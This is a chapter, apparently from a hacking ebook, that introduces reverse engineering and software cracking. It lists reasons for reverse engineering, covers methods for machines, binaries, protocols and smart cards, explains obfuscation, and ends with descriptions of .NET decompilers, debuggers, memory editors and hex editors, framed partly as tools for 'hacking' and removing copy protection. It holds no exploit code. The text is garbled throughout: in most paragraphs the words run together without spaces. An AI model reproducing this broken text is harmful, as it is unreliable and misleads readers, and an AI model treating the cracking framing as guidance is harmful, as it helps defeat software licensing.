WhatisReverseEngineering?Reverse-engineeringisusedformanypurposes:as a learning tool; as a way to make new,compatible products that are cheaper thanwhat’s currently on the market; for makingsoftware interoperate more effectively or tobridgedatabetweendifferentoperatingsystemsordatabases;andtouncovertheundocumentedfeaturesofcommercialproducts.
WhatisSoftwareCracking?
Softwarecrackingisthemodificationofsoftwaretoremoveordisablefeatureswhichare considered undesirable by the person cracking the software, usually related toprotection methods: copy protection, trial/demo version, serial number, hardwarekey,datechecks,CDcheckorsoftwareannoyanceslikenagscreensandadware.Thedistributionanduseofcrackedcopiesisillegalinalmosteverydevelopedcountry.
Thereasonsandgoalsforobtainingsuchinformationvarywidelyfromeverydayorsociallybeneficial actions, to criminal actions,dependingupon the situation.Oftenno intellectual property rights are breached, such as when a person or businesscannot recollect how something was done, or what something does, and needs toreverse engineer it to work it out for themselves. Reverse engineering is alsobeneficial in crime prevention, where suspected malware is reverse engineered tounderstandwhat itdoes,andhowtodetectandremove it,andtoallowcomputersand devices towork together (“interoperate”) and to allow saved files on obsoletesystems to be used in newer systems.By contrast, reverse engineering can also beusedto“crack”softwareandmediatoremovetheircopyprotection,ortocreatea(possiblyimproved)copyorevenaknockoff;thisisusuallythegoalofacompetitor.
Reverse engineering has its origins in the analysis of hardware for commercial ormilitary advantage. However, the reverse engineering process in itself is notconcernedwith creatinga copyor changing theartifact in someway; it is onlyananalysisinordertodeducedesignfeaturesfromproductswithlittleornoadditionalknowledgeabouttheproceduresinvolvedintheiroriginalproduction.
ReasonsforReverseEngineering.
● Interfacing.Reverseengineeringcanbeusedwhenasystemisrequiredtointerface to another system and how both systems would negotiate is to beestablished.Suchrequirementstypicallyexistforinteroperability.
●Militaryorcommercialespionage.Learningaboutanenemy’sorcompetitor’slatestresearchbystealingorcapturingaprototypeanddismantlingit.Itmayresultindevelopmentofsimilarproduct,orbettercountermeasuresforit.
●Improvedocumentationshortcomings.Reverseengineeringcanbedonewhendocumentationofasystemforitsdesign,production,operationormaintenancehave shortcomings and original designers are not available to improve it.Reverse engineeringof software canprovide themost currentdocumentationnecessaryforunderstandingthemostcurrentstateofasoftwaresystem.
● Obsolescence. Integrated circuits often seem to have been designed onobsolete, proprietary systems, which means that when those systems can nolonger bemaintained (lack of spare parts, inefficiency, etc.), the onlyway toincorporate the functionality into new technology is to reverse-engineer theexisting chip and then re-design it using newer tools, and using theunderstanding gained, as a guide. Another obsolescence originated problemwhichcanbesolvedbyreverseengineeringistheneedtosupport(maintenanceand supply for continuous operation) existing, legacy devices which are nolonger supported by their OEM. This problem is particularly critical inmilitaryoperations.
●Softwaremodernization-oftenknowledgeislostovertime,whichcanpreventupdatesandimprovements.Reverseengineeringisgenerallyneededinordertounderstandthe‘as is’stateofexistingor legacysoftware inordertoproperlyestimate the effort required tomigrate systemknowledge into a ‘tobe’ state.Much of this may be driven by changing functional, compliance or securityrequirements.
● Product security analysis. To examine how a product works, what arespecifications of its components, estimate costs and identify potential patentinfringement. Acquiring sensitive data by disassembling and analysing thedesign of a system component. Another intent may be to remove copyprotection,circumventionofaccessrestrictions.
● Bugfixing.To fix (or sometimes to enhance) legacy softwarewhich is nolongersupportedbyitscreators(e.g.abandonware).
● Creation of unlicensed/unapproved duplicates, such duplicates are calledsometimesclonesinthecomputingdomain.
●Academic/learningpurposes.Reverseengineeringforlearningpurposesmay
be understand the key issues of an unsuccessful design and subsequentlyimprovethedesign.
● Competitive technical intelligence. Understand what one’s competitor isactuallydoing,versuswhattheysaytheyaredoing.
TypesofReverseEngineering.Reverseengineeringofmachines
Ascomputer-aideddesign(CAD)hasbecomemorepopular,reverseengineeringhasbecomeaviablemethodtocreatea3Dvirtualmodelofanexistingphysicalpartforuse in 3D CAD, CAM, CAE or other software. The reverse-engineering processinvolvesmeasuringanobjectandthenreconstructingitasa3Dmodel.Thephysicalobjectcanbemeasuredusing3Dscanningtechnologies likeCMMs,laserscanners,structured lightdigitizers,orIndustrialCTScanning(computedtomography).Themeasured data alone, usually represented as a point cloud, lacks topologicalinformationandisthereforeoftenprocessedandmodeledintoamoreusableformatsuchasatriangular-facedmesh,asetofNURBSsurfaces,oraCADmodel.
Reverse engineering is also used by businesses to bring existing physical geometryintodigitalproductdevelopmentenvironments,tomakeadigital3Drecordoftheirownproducts,ortoassesscompetitors’products.It isusedtoanalyse,forinstance,how a product works, what it does, and what components it consists of, estimatecosts,andidentifypotentialpatentinfringement,etc.
Value engineering is a related activity also used by businesses. It involves de-constructing and analysing products, but the objective is to find opportunities forcostcutting.
Reverseengineeringofsoftware
The term reverse engineering as applied to software means different things todifferent people, promptingChikofsky andCross towrite a paper researching thevarious uses and defining a taxonomy. From their paper, they state, “Reverseengineeringistheprocessofanalyzingasubjectsystemtocreaterepresentationsofthesystematahigherlevelofabstraction.”Itcanalsobeseenas“goingbackwardsthrough the development cycle”. In this model, the output of the implementationphase (insourcecode form) isreverse-engineeredback to theanalysisphase, inaninversion of the traditional waterfall model. Another term for this technique isprogramcomprehension.
Other purposes of reverse engineering include security auditing, removal of copyprotection (“cracking”), circumvention of access restrictions often present inconsumer electronics, customization of embedded systems (such as engine
management systems), in-house repairs or retrofits, enabling of additional featureson low-cost “crippled” hardware (such as some graphics card chip-sets), or evenmeresatisfactionofcuriosity.
Binarysoftware
This process is sometimes termed Reverse Code Engineering, or RCE. As anexample,decompilationofbinariesfortheJavaplatformcanbeaccomplishedusingJad.Onefamouscaseofreverseengineeringwasthefirstnon-IBMimplementationof thePCBIOSwhich launchedthehistoricIBMPCcompatible industry thathasbeen the overwhelmingly dominant computer hardware platform for many years.ReverseengineeringofsoftwareisprotectedintheU.S.bythefairuseexceptionincopyright law. The Samba software, which allows systems that are not runningMicrosoftWindowssystemstosharefileswithsystemsthatare,isaclassicexampleof software reverse engineering, since the Samba project had to reverse-engineerunpublished information about how Windows file sharing worked, so that non-Windowscomputerscouldemulateit.TheWineprojectdoesthesamethingfortheWindowsAPI,andOpenOffice.org isonepartydoing this for theMicrosoftOfficefileformats.TheReactOSprojectisevenmoreambitiousinitsgoals,asitstrivestoprovidebinary(ABIandAPI)compatibilitywiththecurrentWindowsOSesoftheNTbranch, allowing softwareanddriverswritten forWindows to runona clean-room reverse-engineered GPL free software or open-source counterpart.WindowsSCOPE allows for reverse-engineering the full contents of a Windowssystem’s livememory includingabinary-level, graphical reverse engineeringof allrunningprocesses.
Anotherclassic,ifnotwell-knownexampleisthatin1987BellLaboratoriesreverse-engineeredtheMacOSSystem4.1,originallyrunningontheAppleMacintoshSE,sotheycouldrunitonRISCmachinesoftheirown.
Binarysoftwaretechniques
Reverseengineeringofsoftwarecanbeaccomplishedbyvariousmethods.Thethreemaingroupsofsoftwarereverseengineeringare:
1. Analysis through observation of information exchange, most prevalent inprotocol reverse engineering, which involves using bus analyzers and packetsniffers, for example, for accessing a computer bus or computer networkconnectionandrevealingthetrafficdatathereon.Busornetworkbehaviorcanthen be analyzed to produce a stand-alone implementation that mimics thatbehavior. This is especially useful for reverse engineering device drivers.Sometimes, reverse engineering on embedded systems is greatly assisted bytoolsdeliberatelyintroducedbythemanufacturer,suchasJTAGportsorotherdebuggingmeans.InMicrosoftWindows,low-leveldebuggerssuchasSoftICEarepopular.
2. Disassemblyusingadisassembler,meaningtherawmachinelanguageoftheprogramisreadandunderstoodinitsownterms,onlywiththeaidofmachine-languagemnemonics.Thisworksonanycomputerprogrambutcantakequitesome time, especially for someone not used tomachine code.The InteractiveDisassemblerisaparticularlypopulartool.
Reverseengineeringofprotocols
Protocols are sets of rules that describe message formats and how messages areexchanged (i.e., the protocol state-machine). Accordingly, the problem of protocolreverse-engineeringcanbepartitioned intotwosubproblems;message formatandstate-machinereverse-engineering.
Themessage formatshave traditionally been reverse-engineered througha tediousmanual process, which involved analysis of how protocol implementations processmessages,butrecentresearchproposedanumberofautomaticsolutions.Typically,these automatic approaches either group observed messages into clusters usingvarious clustering analyses, or emulate the protocol implementation tracing themessageprocessing.
Therehasbeen lessworkonreverse-engineeringof state-machinesofprotocols. Ingeneral, the protocol state-machines can be learned either through a process ofoffline learning,whichpassivelyobservescommunicationandattemptstobuildthemostgeneralstate-machineacceptingallobservedsequencesofmessages,andonlinelearning,whichallowsinteractivegenerationofprobingsequencesofmessagesandlisteningtoresponsestothoseprobingsequences.Ingeneral,offlinelearningofsmallstate-machines is known to be NP-complete, while online learning can be done inpolynomial time. An automatic offline approach has been demonstrated byComparettietal.andanonlineapproachveryrecentlybyChoetal.
Other components of typical protocols, like encryption andhash functions, can bereverse-engineeredautomaticallyaswell.Typically, theautomaticapproachestracethe execution of protocol implementations and try to detect buffers in memoryholdingunencryptedpackets.
Reverseengineeringofintegratedcircuits/smartcards
Reverseengineering isan invasiveanddestructiveformofanalyzingasmartcard.Theattackergrindsawaylayerafterlayerofthesmartcardandtakespictureswithan electron microscope. With this technique, it is possible to reveal the completehardwareandsoftwarepartofthesmartcard.Themajorproblemfortheattackeristo bring everything into the right order to find out how everything works. Themakersofthecardtrytohidekeysandoperationsbymixingupmemorypositions,forexample,busscrambling.Insomecases, it isevenpossible toattachaprobeto
measure voltageswhile the smart card is still operational.Themakers of the cardemploy sensors to detect and prevent this attack. This attack is not very commonbecause it requires a large investment in effort and special equipment that isgenerallyonlyavailabletolargechipmanufacturers.Furthermore,thepayofffromthisattackislowsinceothersecuritytechniquesareoftenemployedsuchasshadowaccounts.
Note:InthischapterIwillbeonlydiscussingaboutreverseengineeringofsoftwares.But ifyou’re interestedin learningall thesemethodsthenemailme,I’llpersonallyhelpyouwithit.
SoftwareObfuscation
In software development, obfuscation is the deliberate act of creating obfuscatedcode, i.e. source ormachine code that is difficult for humans to understand. Likeobfuscation in natural language, it may use needlessly roundabout expressions tocomposestatements.
Programmers may deliberately obfuscate code to conceal its purpose (securitythrough obscurity) or its logic, in order to prevent tampering, deter reverseengineering,orasapuzzleorrecreationalchallengeforsomeonereadingthesourcecode.
Programsknownasobfuscatorstransformreadablecodeintoobfuscatedcodeusingvarioustechniques.
Obfuscatingsoftware
A variety of tools exist to perform or assist with code obfuscation. These includeexperimental research tools created by academics, hobbyist tools, commercialproducts written by professionals, and open-source software. There also existdeobfuscationtoolsthatattempttoperformthereversetransformation.
Although themajority of commercial obfuscation solutions work by transformingeitherprogramsourcecode,orplatform-independentbytecodeasusedbyJavaand.NET,therearealsosomethatworkwithCandC++- languagesthataretypicallycompiledtonativecode,orworkdirectlyoncompiledbinaries.
Disadvantagesofobfuscation
Obfuscationcanmakereading,writingandreverse-engineeringaprogramdifficultandtime-consuming,butnotnecessarilyimpossible.Someanti-virussoftware,suchasAVG,willalsoalerttheiruserswhentheylandonasitewithcodeobfuscated,asone of the purposes of obfuscation can be to hidemalicious code. However, somedevelopers may employ code obfuscation for the purpose of reducing file size orincreasing security. The average user may not expect their antivirus software toprovide alerts about an otherwise harmless piece of code, especially from trusted
corporations,sosuchafeaturemayactuallyserveasadeterrent.
Therehasbeendebateonwhether it is illegal toskirtcopyleft software licensesbyreleasingsourcecodeinobfuscatedform,suchasincasesinwhichtheauthorislesswillingtomakethesourcecodeavailable.TheissueisaddressedintheGNUGeneralPublicLicensebydefiningsourcecodeasthe“preferred”versionofthesourcecodebe made available. The GNU website states “Obfuscated ‘source code’ is not realsourcecodeanddoesnotcountassourcecode.”
Whatare.NETDecompilers?
Whatisareflector[.NET]:
“The .NETReflectorwas the first .NETassembly browser can beused to inspect, navigate, search, analyze, andbrowsethecontentsofa .NETcomponentsuchasanassemblyandtranslatesthebinaryinformationtoahuman-readableform.BydefaultReflectorallowsdecompilationof.NETassembliesintoC#,VisualBasic.NET,CommonIntermediateLanguageandF#(alphaversion).Reflectoralsoincludesa“CallTree”thatcanbeusedtodrilldownintoILmethodstoseewhatothermethodstheycall.Itwillshowthemetadata,resourcesandXMLdocumentation..NETReflector can be used by .NET developers to understand the inner workings of code libraries, to show thedifferencesbetweentwoversionsofthesameassembly,andhowthevariouspartsofa.NETapplicationinteractwitheachother.TherearealargenumberofaddonsforReflector.”-Wikipedia(.NetReflector)
HowcanIuseoneforhackingordecompiling?
Reflectors [Such as the official one below, yep it’s shareware] are awesome fordecompiling software.These days, almost everywindows app (psst:Windows 8 aswell) is using the .NET framework to power their app.With a reflector, you can‘drill’intoandexplorethecodepoweringapplications.
OpenSourceReflector[FREE]:http://wiki.sharpdevelop.net/ILSpy.ashx
TheOFFICIAL.NETReflector[$35butWORTHIT]:http://www.reflector.net
SometoolsforReverseEngineeringAssemblyInspectors
ILSpy-anew.NETassemblyinspector
●Assemblybrowsing
●ILDisassembly
●DecompilationtoC#
●Savingofresources
●Searchfortypes/methods/properties(substring)
●Hyperlink-basedtype/method/propertynavigation
●Base/Derivedtypesnavigation
●Andmanymore!
.NETReflector-Browse,analyze,decompileanddebug.NETcode
●DebugassemblieswithoutsourcecodeusingtheVisualStudiodebugger
●Decompileandexplore.NETassembliesinsideVisualStudio
●Serveasapowerfulobjectbrowser
●Decompile.NETcodetounderstandhowitworks
●Learnorteachthecomplexitiesofa.NETlanguage
●Provideabetteralternativetolibrarydocumentation
●Andmanymore!
Debuggers
OllyDBGv1.10-anassemblylevelanalysingdebugger
●DirectlyloadsanddebugsDLLs
●Objectfilescanning-locatesroutinesfromobjectfilesandlibraries
●Allowsforuser-definedlabels,commentsandfunctiondescriptions
●UnderstandsdebugginginformationinBorland®format
● Saves patches between sessions, writes them back to executable file andupdatesfixups
●Openarchitecture-manythird-partypluginsareavailable
●Andmanymore!
ImmunityDebugger-KnowingYou’reSecure
●Adebuggerwithfunctionalitydesignedspecificallyforthesecurityindustry
●Cutsexploitdevelopmenttimeby50%
●Simple,understandableinterfaces
●Robustandpowerfulscriptinglanguageforautomatingintelligentdebugging
IDA-theworld’ssmartestandmostfeature-richdisassembler
●Multi-hostedapplication
●Multi-processordisassembler
●Fullyprogrammableenvironment
●Completepluginprogramming
●Localandremotedebugger
●Hostilecodeanalyzer
●COTSvalidation
MemoryEditors
MHS-anaveragememoryeditor
●Datatypesearch
●Stringsearch
●Pointersearch
●Groupsearch
●Subsearch
●Scriptsearch
●RAMwatcher
●Executablebreakpoints
●Conditionalbreakpoints
CheatEngine-anopensourcememoryscanner
●Open-source
●Memoryscanner
●Variablescanner
●Variablechanger
●Debugger
●Disassembler
●Assembler
●“Speedhack”
●Systeminspectiontools
●Directmanipulationtools
HexEditors
HexDecCharEdit-morethanacommonhex-editor
●Allowsviewing,modification,searching,comparisons,andanalysisofbinaryfiles
●Supportscoloredmarks
●Hexadecimal/decimaloutputandinput